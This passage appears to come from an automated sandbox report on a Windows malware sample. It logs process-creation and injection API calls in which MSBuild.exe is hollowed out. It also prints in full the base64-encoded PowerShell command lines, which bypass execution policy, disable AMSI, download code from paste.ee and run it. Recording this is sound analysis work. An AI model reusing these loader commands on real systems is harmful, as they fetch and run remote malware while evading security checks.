QAoACIAUwAiACsAIgB5ACIAKwAiAHMAIgArACIAdAAiACsAIgBlACIAKwAiAG0AIgArACIALgAiACsAIgBNACIAKwAiAGEAIgArACIAbgAiACsAIgBhACIAKwAiAGcAIgArACIAZQAiACsAIgBtACIAKwAiAGUAIgArACIAbgAiACsAIgB0ACIAKwAiAC4AIgArACIAQQAiACsAIgB1ACIAKwAiAHQAIgArACIAbwAiACsAIgBtACIAKwAiAGEAIgArACIAdAAiACsAIgBpAG8AIgArACIAbgAuACQAKABbAEMAaABhAFIAXQAoADMAMwArADMAMgApACsAWwBjAGgAYQByAF0AKABbAGIAWQB0AGUAXQAwAHgANgBEACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADYAOQApACkAIgArACIAVQAiACsAIgB0ACIAKwAiAGkAIgArACIAbAAiACsAIgBzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAcwBZAHMAVABFAE0ALgBuAGUAdAAuAFcARQBiAHUAdABJAGwAaQB0AHkAXQA6ADoASABUAE0ATABkAGUAQwBPAGQAZQAoACcAJgAjADkANwA7ACYAIwAxADAAOQA7ACYAIwAxADEANQA7ACYAIwAxADAANQA7ACcAKQApACIAKwAiAEMAIgArACIAbwAiACsAIgBuACIAKwAiAHQAIgArACIAZQAiACsAIgB4ACIAKwAiAHQAIgAsACAAIgBOACIAKwAiAG8AIgArACIAbgAiACsAIgBQACIAKwAiAHUAIgArACIAYgAiACsAIgBsACIAKwAiAGkAIgArACIAYwAsAFMAIgArACIAdAAiACsAIgBhACIAKwAiAHQAIgArACIAaQAiACsAIgBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAWwBJAG4AdABQAHQAcgBdACQARQBXAEEAQQBEACkAOwB9AGUAbABzAGUAIAB7AH0AOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AbwBTAGwAWQBKACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBwADcARQBIAEMAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA7AA==
Process injection Process 6096 resumed a thread in remote process 3752
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000033c
suspend_count: 1
process_identifier: 3752
1 0 0
option -executionpolicy bypass value Attempts to bypass execution policy
option -executionpolicy bypass value Attempts to bypass execution policy
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 652
thread_handle: 0x00000134
process_identifier: 2352
current_directory: C:\Windows\SysWOW64
filepath:
track: 1
command_line: powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAagBvAHIAIAArACAAJwAuACcAIAArACAAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuAC4AbQBpAG4AbwByADsAaQBmACAAKAAkAG8AcwB2AGUAcgAgAC0AZwBlACAAMQAwAC4AMAApACAAewBlAGMAaABvACAAVwBpAG4AZABvAHcAcwAxADAAOwAkAEUAVwBBAEEARAA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADYAKwA5ADAANAAwACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBDAGgAYQBSAF0AKAAzADMAKwAzADIAKQArAFsAYwBoAGEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADYARAApACsAWwBjAGgAQQByAF0AKABbAEIAWQBUAGUAXQAwAHgANwAzACkAKwBbAEMAaABhAHIAXQAoAFsAQgB5AHQAZQBdADAAeAA2ADkAKQApAFUAdABpAGwAcwAiACkALgBHAGUAdABGAGkAZQBsAGQAKAAiACQAKABbAHMAWQBzAFQARQBNAC4AbgBlAHQALgBXAEUAYgB1AHQASQBsAGkAdAB5AF0AOgA6AEgAVABNAEwAZABlAEMATwBkAGUAKAAnACYAIwA5ADcAOwAmACMAMQAwADkAOwAmACMAMQAxADUAOwAmACMAMQAwADUAOwAnACkAKQBTAGUAcwBzAGkAbwBuACIALAAgACIATgAiACsAIgBvACIAKwAiAG4AIgArACIAUAAiACsAIgB1ACIAKwAiAGIAIgArACIAbAAiACsAIgBpACIAKwAiAGMAIgArACIALAAiACsAIgBTACIAKwAiAHQAIgArACIAYQAiACsAIgB0ACIAKwAiAGkAIgArACIAYwAiACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUwAiACsAIgB5ACIAKwAiAHMAIgArACIAdAAiACsAIgBlACIAKwAiAG0AIgArACIALgAiACsAIgBNACIAKwAiAGEAIgArACIAbgAiACsAIgBhACIAKwAiAGcAIgArACIAZQAiACsAIgBtACIAKwAiAGUAIgArACIAbgAiACsAIgB0ACIAKwAiAC4AIgArACIAQQAiACsAIgB1ACIAKwAiAHQAIgArACIAbwAiACsAIgBtACIAKwAiAGEAIgArACIAdAAiACsAIgBpAG8AIgArACIAbgAuACQAKABbAEMAaABhAFIAXQAoADMAMwArADMAMgApACsAWwBjAGgAYQByAF0AKABbAGIAWQB0AGUAXQAwAHgANgBEACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADYAOQApACkAIgArACIAVQAiACsAIgB0ACIAKwAiAGkAIgArACIAbAAiACsAIgBzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAcwBZAHMAVABFAE0ALgBuAGUAdAAuAFcARQBiAHUAdABJAGwAaQB0AHkAXQA6ADoASABUAE0ATABkAGUAQwBPAGQAZQAoACcAJgAjADkANwA7ACYAIwAxADAAOQA7ACYAIwAxADEANQA7ACYAIwAxADAANQA7ACcAKQApACIAKwAiAEMAIgArACIAbwAiACsAIgBuACIAKwAiAHQAIgArACIAZQAiACsAIgB4ACIAKwAiAHQAIgAsACAAIgBOACIAKwAiAG8AIgArACIAbgAiACsAIgBQACIAKwAiAHUAIgArACIAYgAiACsAIgBsACIAKwAiAGkAIgArACIAYwAsAFMAIgArACIAdAAiACsAIgBhACIAKwAiAHQAIgArACIAaQAiACsAIgBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAWwBJAG4AdABQAHQAcgBdACQARQBXAEEAQQBEACkAOwB9AGUAbABzAGUAIAB7AH0AOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AbwBTAGwAWQBKACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBwADcARQBIAEMAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA7AA==
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000138
1 1 0

NtResumeThread

thread_handle: 0x00000294
suspend_count: 1
process_identifier: 2352
1 0 0

NtResumeThread

thread_handle: 0x000002e8
suspend_count: 1
process_identifier: 2352
1 0 0

NtResumeThread

thread_handle: 0x00000444
suspend_count: 1
process_identifier: 2352
1 0 0

CreateProcessInternalW

thread_identifier: 8956
thread_handle: 0x00000448
process_identifier: 6096
current_directory: C:\Windows\SysWOW64
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAagBvAHIAIAArACAAJwAuACcAIAArACAAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuAC4AbQBpAG4AbwByADsAaQBmACAAKAAkAG8AcwB2AGUAcgAgAC0AZwBlACAAMQAwAC4AMAApACAAewBlAGMAaABvACAAVwBpAG4AZABvAHcAcwAxADAAOwAkAEUAVwBBAEEARAA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADYAKwA5ADAANAAwACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBDAGgAYQBSAF0AKAAzADMAKwAzADIAKQArAFsAYwBoAGEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADYARAApACsAWwBjAGgAQQByAF0AKABbAEIAWQBUAGUAXQAwAHgANwAzACkAKwBbAEMAaABhAHIAXQAoAFsAQgB5AHQAZQBdADAAeAA2ADkAKQApAFUAdABpAGwAcwAiACkALgBHAGUAdABGAGkAZQBsAGQAKAAiACQAKABbAHMAWQBzAFQARQBNAC4AbgBlAHQALgBXAEUAYgB1AHQASQBsAGkAdAB5AF0AOgA6AEgAVABNAEwAZABlAEMATwBkAGUAKAAnACYAIwA5ADcAOwAmACMAMQAwADkAOwAmACMAMQAxADUAOwAmACMAMQAwADUAOwAnACkAKQBTAGUAcwBzAGkAbwBuACIALAAgACIATgAiACsAIgBvACIAKwAiAG4AIgArACIAUAAiACsAIgB1ACIAKwAiAGIAIgArACIAbAAiACsAIgBpACIAKwAiAGMAIgArACIALAAiACsAIgBTACIAKwAiAHQAIgArACIAYQAiACsAIgB0ACIAKwAiAGkAIgArACIAYwAiACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUwAiACsAIgB5ACIAKwAiAHMAIgArACIAdAAiACsAIgBlACIAKwAiAG0AIgArACIALgAiACsAIgBNACIAKwAiAGEAIgArACIAbgAiACsAIgBhACIAKwAiAGcAIgArACIAZQAiACsAIgBtACIAKwAiAGUAIgArACIAbgAiACsAIgB0ACIAKwAiAC4AIgArACIAQQAiACsAIgB1ACIAKwAiAHQAIgArACIAbwAiACsAIgBtACIAKwAiAGEAIgArACIAdAAiACsAIgBpAG8AIgArACIAbgAuACQAKABbAEMAaABhAFIAXQAoADMAMwArADMAMgApACsAWwBjAGgAYQByAF0AKABbAGIAWQB0AGUAXQAwAHgANgBEACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADYAOQApACkAIgArACIAVQAiACsAIgB0ACIAKwAiAGkAIgArACIAbAAiACsAIgBzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAcwBZAHMAVABFAE0ALgBuAGUAdAAuAFcARQBiAHUAdABJAGwAaQB0AHkAXQA6ADoASABUAE0ATABkAGUAQwBPAGQAZQAoACcAJgAjADkANwA7ACYAIwAxADAAOQA7ACYAIwAxADEANQA7ACYAIwAxADAANQA7ACcAKQApACIAKwAiAEMAIgArACIAbwAiACsAIgBuACIAKwAiAHQAIgArACIAZQAiACsAIgB4ACIAKwAiAHQAIgAsACAAIgBOACIAKwAiAG8AIgArACIAbgAiACsAIgBQACIAKwAiAHUAIgArACIAYgAiACsAIgBsACIAKwAiAGkAIgArACIAYwAsAFMAIgArACIAdAAiACsAIgBhACIAKwAiAHQAIgArACIAaQAiACsAIgBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAWwBJAG4AdABQAHQAcgBdACQARQBXAEEAQQBEACkAOwB9AGUAbABzAGUAIAB7AH0AOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AbwBTAGwAWQBKACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBwADcARQBIAEMAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA7AA==
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x0000044c
1 1 0

NtResumeThread

thread_handle: 0x00000490
suspend_count: 1
process_identifier: 2352
1 0 0

NtResumeThread

thread_handle: 0x000002a0
suspend_count: 1
process_identifier: 6096
1 0 0

NtResumeThread

thread_handle: 0x000002f4
suspend_count: 1
process_identifier: 6096
1 0 0

NtResumeThread

thread_handle: 0x0000045c
suspend_count: 1
process_identifier: 6096
1 0 0

NtResumeThread

thread_handle: 0x000005b4
suspend_count: 1
process_identifier: 6096
1 0 0

CreateProcessInternalW

thread_identifier: 2228
thread_handle: 0x0000033c
process_identifier: 3752
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
track: 1
command_line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
filepath_r: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000036c
1 1 0

NtGetContextThread

thread_handle: 0x0000033c
1 0 0

NtAllocateVirtualMemory

process_identifier: 3752
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000036c
1 0 0

WriteProcessMemory

buffer: MZ€ÿÿ@@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELqÂ[à H€1)@ь.text¿~€ à
base_address: 0x00400000
process_identifier: 3752
process_handle: 0x0000036c
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 3752
process_handle: 0x0000036c
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 3752
process_handle: 0x0000036c
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4204849
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000033c
process_identifier: 3752
1 0 0

NtResumeThread

thread_handle: 0x0000033c
suspend_count: 1
process_identifier: 3752
1 0 0

NtResumeThread

thread_handle: 0x000003b0
suspend_count: 1
process_identifier: 6096
1 0 0